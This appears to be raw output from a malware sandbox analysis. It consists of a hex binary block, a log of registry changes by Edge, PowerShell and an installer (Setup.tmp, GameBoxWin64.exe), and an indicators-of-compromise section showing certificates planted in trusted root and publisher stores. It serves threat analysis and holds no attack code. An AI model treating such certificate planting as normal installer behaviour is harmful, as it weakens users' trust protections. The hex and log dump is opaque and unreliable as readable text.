03c033e01a008a800c76ea900b8fc4501d079a90040eaaa00d89c450140eaaa0060caaa0078473e0160caaa00f65caa00e0a44501f852aa0069c2ab00f4b045016cc7ab000da1ac00eca8450110bcac00ca66ac00704d3c0110bdad004be6ad00185d44014ce1ad006cc1ad0068533a01802dad00903dad0020654401d07dad00f75aad00185d4401f855ad00fe4eb000286d440100b1b1002e9fb10068533a013081b1004dfcb100286b420150e1b100cc7db1003c794401cc7db100eb5ab100286b4201ec5db100fd4cb10068533a0160d2b200ad1fb20064214401e052b200fd4fb20068533a0100b3b30059eab30088cd440170c3b300c172b30090d54401e053b30015adb80098dd44013088b800f74fb800a0e5440110a9b90012abb900c8f43d012099b900378eb900cc8f4201378eb90053eab900cc8f420153eab9008930b900605c3d018930b900a118b90088b43d01a118b900b70eb900cc8f4201b70eb900d26bb900cc8f4201d26bb900eb52b900cc8f4201eb52b90005bfba00cc8f420105bfba002298ba00cc8f42012298ba003b81ba00cc8f42013b81ba005fe5ba00cc8f42015fe5ba0078c2ba00cc8f420178c2ba00912bba00cc8f4201912bba00ab11ba00cc8f4201ab11ba00c47eba00cc8f4201c47eba00dd67ba00cc8f4201dd67ba00f74dba00cc8f4201f74dba000eb5bb00cc8f42010eb5bb00269dbb00cc8f4201269dbb0052e9bb00cc8f420160dbbb00803bbb00cc8f4201000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000094dd49006029490084cd490094dd4900f4bd490094dd49004821690094dd490064096d007c0d7100403171004c1f530010435300eca549004c236f00305f6f00cc814d0068254d0094dd490094dd4900104959005008580098d149004c05490018485000a0fc5c0068ed85002c5478004c357900ccb57900d079a9004ce1ad0036360000474700004a4a00004e4e0000505000004e4e0000575700004e4e00005d5d00000b0b0000131300005959000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101181800001818008080000000000000000000000000000101020200003030008080000000000000000000000000000101090d04004848000060f091017d7c0100000000000000000000000000000000003c034715014c561317011a0601531a161f1e1707450b0d0c0b0d07095a1a7201126b151f075307150f0a050d03010b581a5e1c165418013307365d120016080f0e1559581501021d4e1a52071c5449100b0d080c125e40040a111d1c1c0912594e0c02575b121e43584716074d0c0f070f031607223317011a0601531a161f1e171933072a001c48060706073d2708094f581501021d4e1f57071c5449100b0d080c125e40040a111d1c1c0912594e0c02575b121e435845111c33072a0000001c4f160616071b1d0d4733072a00000000001c4e171404101607110134221b1f1f05090202164d33072a000000000000001c4e1714041016071101213d1d0616011d060122291313094c4c09131309511a46123a271819040e175507551c2822000616004e1a41070d1f1642070f1133072a00000000001c135d171404101607110134221b1f1f05090202164d33072a0000001c135c160616071b1d0d4733072a001c135b060706073d27080951330736134e120016080f0e154733070a0000000000000000000000000000000000000000000000000000000000000000000000c0c0000c0d0100882a323212121a1a62627a7a42424a4ab2b3bbbb8b8b93939b9bfbfbc3c3cbcb23232b2b333313131b1ba3a4acacb4b4bcbcf4f5fdfdc5c5cdcdd5d5dddd25252d2d35353d3d05050d0d15151d1d65656d6d75757d7d45454d4d55555d5da5a6aeaeb6b6bebe86868e8e96969e9ee6e6eeeef6f6fefec6c6ceced6d6dede26262e2e36363e3e06060e0e16161e1e66666e6e76767e7e46464e4e56565e5ea6a7afafb7b7bfbf87878f8f97979f9fe7e7efeff7f7ffffc7c7cfcfd7d7dfdf27272f2f37373f3f07070f0f17171f1f67676f6f77777f7f47474f4f57575f5fa7a8a0a0b8b8b0b08888808098989090e8e8e0e0f8f8f0f0c8c8c0c0787f4f4f5f5f5757af0000d0d0001011010000a0a8a8b0b0b8b8808088889898e0e0e8e8f0f0f8f8c0c0c8c8d0d028283838000008081010181860606868707078784040484850505858a0a1a9a9b1b1b9b98181898991919999e1e1e9e9f1f1f9f9797f47474f4f5757e7e8e0e0f8f8f0f0c8c8c0c0d8d8d0d02828202038383030080800001818101068686060787870704848404058585050a8a9a1a1b9b9b1b18989818199999191e9e9e1e1f9f9f1f1c9c9c1c1d9d9d1d1292921213939090901011919111169696161797971714949414159595151a9aaa2a2babab2b28a8a82829a9a9292eaeae2e2fafaf2f2cacac2c2dadad2d22a2a22223a3a32320a0a02021a1a12126a6a62627a7a72724a4a42425a5a5252aa0000e0e00070710100c86c7c7c4c4c5c5cacadbdbd8d8d9d9dededfdfdcdcddddd2d2d3d3d0d0d1d1d6d6d7d7d4d4d5d5dadaebebe8e8e9e9eeeeefefececedede2e2e3e3e0e0e1e1e6e6e7e7e4e4e5e5eaeafbfbf8f8f9f9fefefffffcfcfdfdf2f2f3f3f0f0f1f1f6f6f7f7f4f4f5f5fafa0b0b080809090e0e0f0f0c0c0d0d020203030000010106060707040405050a0a1b1b181819191e1e1f1f1c1c1d1d121213131010111116161717141415151a1a2b2b282829292e2e2f2f2c2c2d2d222223232020212126262727242425252a2a3b3b383839393e3e3f3f3c3c3d3d323233333030313136363737343435353a3a4b4b484849494e4e4f4f4c4c4d4d424243434040414146464747444445454a4a5b5b585859595e5e5f5f5c5c5d5d525253535050515156565757545455555a5a6b6b686869696e6e6f6f6c6c6d6d626263636060616166666767646465656a6a7b7b787879797e7e7f7f7c7c7d7d727273737070717176767777747475757aff0f0008484000008a8b8b888889898e8e8f8f8c8c8d8d828283838080818186868787848485858a8a9b9b989899999e9e9f9f9c9c9d9d929293939090919196969797949495959a9aababa8a8a9a9aeaeafafacacadada2a2a3a3a0a0a1a1a6a6a7a7a4a4a5a5a828f9f9fefefffffcfcfdfdf2f2f3f3f0f0f1f1f6f6f7f7f4f4f5f5faf000101b4b5010000a0b0b080809090e0e0f0f0c0c0d0d020203030000010106060707040405050a0a1b1b181819191e1e1f1f1c1c1d1d121213131010111116161717141415151a1a2b2b282829292e2e2f2f2c2c2d2d222223232020212126262727242425252a2a3b3b383839393e3e3f3f3c3c3d3d323233333030313136363737343435353a3a4b4b484849494e4e4f4f4c4c4d4d424243434040414146464747444445454a4a5b5b585859595e5e5f5f5c5c5d5d525253535050515156565757545455555a5a6b6b686869696e6e6f6f6c6c6d6d626263636060616166666767646465656a6a7b7b787879797e7e7f7f7c7c7d7d727273737070717176767777747475757a7a8b8b888889898e8e8f8f8c8c8d8d828283838080818186868787848485858a8a9b9b989899999e9e9f9f9c9c9d9d929293939090919196969797949495959a9aababa8a8a9a9aeaeafafacacadada2a2a3a3a0a0a1a1a6a6a7a7a4a4a5a5aaaabbbbb8b8b9b9bebebfbfbcbcbdbdb2b2b3b3b0b0b1b1b6b6b7b7b4b4b5b5babacbcbc8c8c9c9cececfcfcccccdcdc2c2c3c3c0c0c1c1c6c6c7c7c4c4c5c5cacadbdbd8d8d9d9dededfdfdad30310110100000882d05050d0da500005051015050000078da32357d7d5d5dbdbe9e9efefe2e2e06060e0e16164e4e5656b6b8b0b08888808098989090e8e8e0e0f8f8f0f0c0c0d8d8d0d0282820203838303008084040b8b99191c1c1a900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 033589468b96d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\adfreevision.com\Total = "76" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "438" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "478" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{3FE80A8A-997D-4B48-B39E-1DBCE172A1E1} = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20EP1MI0-142C-L17D-YD26-2GCP283P3KMT} svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000e93f7fe209c35de5b375f380c2a98e897929d8454d561a16decba7bf2277f3b6515164ecd22e86d45d5273b3fdd79027021f2841d89987423479 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node Setup.tmp Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2b3621958996d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\4EEF7FAF0062D34AB MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "406" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\adfreevision.com MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "98" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhotfeed.com\Total = "850" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhotfeed.com\Total = "159" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b57